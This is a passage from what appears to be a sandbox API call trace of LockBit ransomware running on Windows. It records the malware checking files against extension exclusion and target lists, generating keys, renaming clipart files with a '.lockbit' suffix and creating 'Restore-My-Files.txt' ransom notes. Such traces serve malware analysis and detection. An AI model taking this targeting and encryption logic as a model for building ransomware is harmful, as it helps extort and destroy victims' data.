lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.906] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0241077.WMF") returned 1 [0153.907] lstrcmpiW (lpString1="ntldr", lpString2="J0241077.WMF") returned 1 [0153.907] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0241077.WMF") returned 1 [0153.907] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0241077.WMF") returned -1 [0153.907] lstrcmpiW (lpString1="autorun.inf", lpString2="J0241077.WMF") returned -1 [0153.907] lstrcmpiW (lpString1="thumbs.db", lpString2="J0241077.WMF") returned 1 [0153.907] lstrcmpiW (lpString1="iconcache.db", lpString2="J0241077.WMF") returned -1 [0153.907] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.907] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241077.WMF") returned=".WMF" [0153.907] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.907] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.907] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.908] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.908] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241077.WMF.lockbit") returned 72 [0153.908] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241077.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241077.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0153.909] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.909] malloc (_Size=0x40068) returned 0x1ff1e60 [0153.910] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2090) returned 1 [0153.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0153.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.911] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0153.911] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241077.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241077.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.943] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.944] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.945] free (_Block=0x1fa2ed8) [0153.945] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241077.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.945] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.945] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.945] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c98900, ftCreationTime.dwHighDateTime=0x1be9cdc, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd7c98900, ftLastWriteTime.dwHighDateTime=0x1be9cdc, nFileSizeHigh=0x0, nFileSizeLow=0xcbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0241773.WMF", cAlternateFileName="")) returned 1 [0153.945] lstrcmpiW (lpString1=".", lpString2="J0241773.WMF") returned -1 [0153.945] lstrcmpiW (lpString1="..", lpString2="J0241773.WMF") returned -1 [0153.945] PathFindExtensionW (pszPath="J0241773.WMF") returned=".WMF" [0153.945] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.945] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.945] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.946] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.947] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.947] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0241773.WMF") returned 1 [0153.948] lstrcmpiW (lpString1="ntldr", lpString2="J0241773.WMF") returned 1 [0153.948] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0241773.WMF") returned 1 [0153.948] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0241773.WMF") returned -1 [0153.948] lstrcmpiW (lpString1="autorun.inf", lpString2="J0241773.WMF") returned -1 [0153.948] lstrcmpiW (lpString1="thumbs.db", lpString2="J0241773.WMF") returned 1 [0153.948] lstrcmpiW (lpString1="iconcache.db", lpString2="J0241773.WMF") returned -1 [0153.948] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.948] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241773.WMF") returned=".WMF" [0153.948] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.948] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.948] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.949] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.949] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241773.WMF.lockbit") returned 72 [0153.950] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241773.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241773.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0153.954] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.954] malloc (_Size=0x40068) returned 0x3df0008 [0153.954] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3262) returned 1 [0153.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.955] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241773.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241773.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.958] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.958] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.959] free (_Block=0x1fa2ed8) [0153.959] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241773.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.960] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.960] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.960] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb5d1000, ftCreationTime.dwHighDateTime=0x1be9cdc, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdb5d1000, ftLastWriteTime.dwHighDateTime=0x1be9cdc, nFileSizeHigh=0x0, nFileSizeLow=0x7b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0241781.WMF", cAlternateFileName="")) returned 1 [0153.960] lstrcmpiW (lpString1=".", lpString2="J0241781.WMF") returned -1 [0153.960] lstrcmpiW (lpString1="..", lpString2="J0241781.WMF") returned -1 [0153.960] PathFindExtensionW (pszPath="J0241781.WMF") returned=".WMF" [0153.960] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.960] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.961] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.961] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.962] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0241781.WMF") returned 1 [0153.962] lstrcmpiW (lpString1="ntldr", lpString2="J0241781.WMF") returned 1 [0153.963] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0241781.WMF") returned 1 [0153.963] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0241781.WMF") returned -1 [0153.963] lstrcmpiW (lpString1="autorun.inf", lpString2="J0241781.WMF") returned -1 [0153.963] lstrcmpiW (lpString1="thumbs.db", lpString2="J0241781.WMF") returned 1 [0153.963] lstrcmpiW (lpString1="iconcache.db", lpString2="J0241781.WMF") returned -1 [0153.963] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.963] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241781.WMF") returned=".WMF" [0153.963] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.963] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.963] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.964] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.964] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241781.WMF.lockbit") returned 72 [0153.964] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241781.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0153.965] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.965] malloc (_Size=0x40068) returned 0x3d70450 [0153.965] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1970) returned 1 [0153.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0153.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0153.967] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0153.972] RtlDosPathNameToNtPathName_U (in: 